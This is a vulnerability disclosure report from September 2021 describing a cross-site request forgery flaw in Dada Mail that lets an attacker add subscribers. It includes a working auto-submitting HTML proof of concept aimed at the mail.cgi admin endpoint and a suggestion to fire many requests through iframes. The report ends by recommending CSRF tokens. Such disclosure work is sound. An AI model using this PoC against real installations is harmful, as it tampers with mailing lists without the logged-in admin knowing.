Cross-Site Request Forgery (CSRF) in justingit/dada-mail
Sep 12th 2021
Attacker able to Add any number of subscriber with CSRF attack.
In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.
Or users with low level privilege can send a link to other users and admins with higher privilege and then their malicious request will be executed without that victim users and admins be aware about that.
🕵️♂️ Proof of Concept
1.First of all admin or user with right privileges already should be logged in any browser.
2.Open the PoC.html (it is auto-submit).
3.Here subscriber with email
firstname.lastname@example.org will be added after the
PoC.html file opened.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST"> <input type="hidden" name="flavor" value="add_email" /> <input type="hidden" name="type" value="list" /> <input type="hidden" name="return_to" value="" /> <input type="hidden" name="return_address" value="" /> <input type="hidden" name="not_members_fields_options_mode" value="preserve_if_defined" /> <input type="hidden" name="address" value=""email@example.com",""" /> <input type="hidden" name="process" value="Subscribe/Update Checked Addresses â‡’" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )
This vulnerability is capable of make medium damage on availability and integrity of system.
You should set a CSRF token for each user/form.